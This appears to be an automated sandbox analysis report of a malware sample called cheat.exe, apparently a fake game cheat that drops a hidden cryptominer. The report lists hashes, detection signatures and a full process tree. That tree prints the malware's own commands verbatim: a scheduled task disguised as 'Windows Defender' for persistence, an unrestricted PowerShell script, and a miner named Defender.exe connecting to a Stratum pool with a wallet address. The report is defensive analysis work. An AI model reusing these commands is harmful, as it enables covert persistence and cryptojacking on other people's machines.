Analysis

  • max time kernel
    149s
  • max time network
    118s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    10-08-2021 11:13

General

  • Target

    cheat.exe

  • Size

    12.2MB

  • MD5

    69c885675b1b98e2fbb3f0196a1df2d1

  • SHA1

    533fa79f3b20623ae1c6de3fded5fb54b145af6a

  • SHA256

    73bcd67ddecc7bf320a19bd5dbefdb36c097c3047959d67e0e3cc5e22f8b510b

  • SHA512

    8b89b0a456e9d423c7e0d053772716f2e0e7877bff250e08f788d20b20fcb00bb6da831f59a781964ede23f9de74b5afcda0183d104fca523b392a89d063e44c

Score
9/10

Malware Config

Signatures

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Executes dropped EXE 32 IoCs
  • VMProtect packed file 61 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cheat.exe
    "C:\Users\Admin\AppData\Local\Temp\cheat.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3256
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\d.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\ProgramData\Windows\d.exe
        "C:\ProgramData\Windows\d.exe" 61 C:\ProgramData\Windows\d.bat
        3⤵
        • Executes dropped EXE
        PID:3544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Windows\t.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3948
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender" /TR "C:\ProgramData\Windows\Start.exe" /f
          4⤵
          • Creates scheduled task(s)
          PID:200
    • C:\ProgramData\Windows\Start.exe
      C:\ProgramData\Windows\Start.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3980
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\403B.tmp\403C.tmp\403D.bat C:\ProgramData\Windows\Start.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\system32\timeout.exe
          timeout /t 10
          4⤵
          • Delays execution with timeout.exe
          PID:1696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -executionpolicy Unrestricted C:\ProgramData\Windows\timeout.ps1
          4⤵
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2916
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flvr0mm4\flvr0mm4.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1308
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES69AC.tmp" "c:\Users\Admin\AppData\Local\Temp\flvr0mm4\CSCD2641E6A6F784744954294132A72BA2B.TMP"
              6⤵
                PID:2676
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3876
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:3496
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3920
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:3648
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2104
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2288
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2560
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2196
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1540
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:200
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:3104
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:680
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4036
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:776
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2824
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:780
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:816
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:588
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:3968
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1588
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2320
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
                PID:1168
                • C:\ProgramData\Windows\Defender.exe
                  "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:3052
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                5⤵
                  PID:3288
                  • C:\ProgramData\Windows\Defender.exe
                    "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:512
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                  5⤵
                    PID:3764
                    • C:\ProgramData\Windows\Defender.exe
                      "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3312
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                    5⤵
                      PID:3736
                      • C:\ProgramData\Windows\Defender.exe
                        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:1884
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                      5⤵
                        PID:4068
                        • C:\ProgramData\Windows\Defender.exe
                          "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:584
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                        5⤵
                          PID:2564
                          • C:\ProgramData\Windows\Defender.exe
                            "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:2240
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                          5⤵
                            PID:4004
                            • C:\ProgramData\Windows\Defender.exe
                              "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:776
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                            5⤵
                              PID:2320
                              • C:\ProgramData\Windows\Defender.exe
                                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:1344
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                              5⤵
                                PID:3220
                                • C:\ProgramData\Windows\Defender.exe
                                  "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:1448
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                5⤵
                                  PID:512
                                  • C:\ProgramData\Windows\Defender.exe
                                    "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:3544
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                  5⤵
                                    PID:2512
                                    • C:\ProgramData\Windows\Defender.exe
                                      "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1688
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                    5⤵
                                      PID:3548
                                      • C:\ProgramData\Windows\Defender.exe
                                        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:2496
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                      5⤵
                                        PID:3800
                                        • C:\ProgramData\Windows\Defender.exe
                                          "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:1448
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                        5⤵
                                          PID:4092
                                          • C:\ProgramData\Windows\Defender.exe
                                            "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:492
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                          5⤵
                                            PID:3860
                                            • C:\ProgramData\Windows\Defender.exe
                                              "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:588
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                            5⤵
                                              PID:2276
                                              • C:\ProgramData\Windows\Defender.exe
                                                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:3948
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                              5⤵
                                                PID:3636
                                                • C:\ProgramData\Windows\Defender.exe
                                                  "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2084
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                                5⤵
                                                  PID:2716
                                                  • C:\ProgramData\Windows\Defender.exe
                                                    "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:2356
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                                  5⤵
                                                    PID:1112
                                                    • C:\ProgramData\Windows\Defender.exe
                                                      "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:2908

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • memory/200-212-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/492-412-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/512-292-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/584-322-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/588-422-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/776-342-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/816-252-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/1344-352-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/1448-402-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/1448-362-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/1688-382-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/1884-312-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2084-440-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2196-202-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2240-332-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2288-192-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2320-272-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2356-448-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2496-392-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2824-242-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2908-456-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/2916-133-0x00000226A7D40000-0x00000226A7D41000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2916-155-0x00000226A7D70000-0x00000226A7D71000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2916-147-0x00000226C0293000-0x00000226C0295000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/2916-146-0x00000226C0290000-0x00000226C0292000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/2916-136-0x00000226C0550000-0x00000226C0551000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3052-282-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/3104-222-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/3312-302-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/3496-171-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/3496-172-0x00007FFCFAD10000-0x00007FFCFAD12000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/3544-372-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/3648-182-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/3948-432-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/3968-262-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB

                                          • memory/4036-232-0x0000000140000000-0x0000000141B19000-memory.dmp

                                            Filesize

                                            27.1MB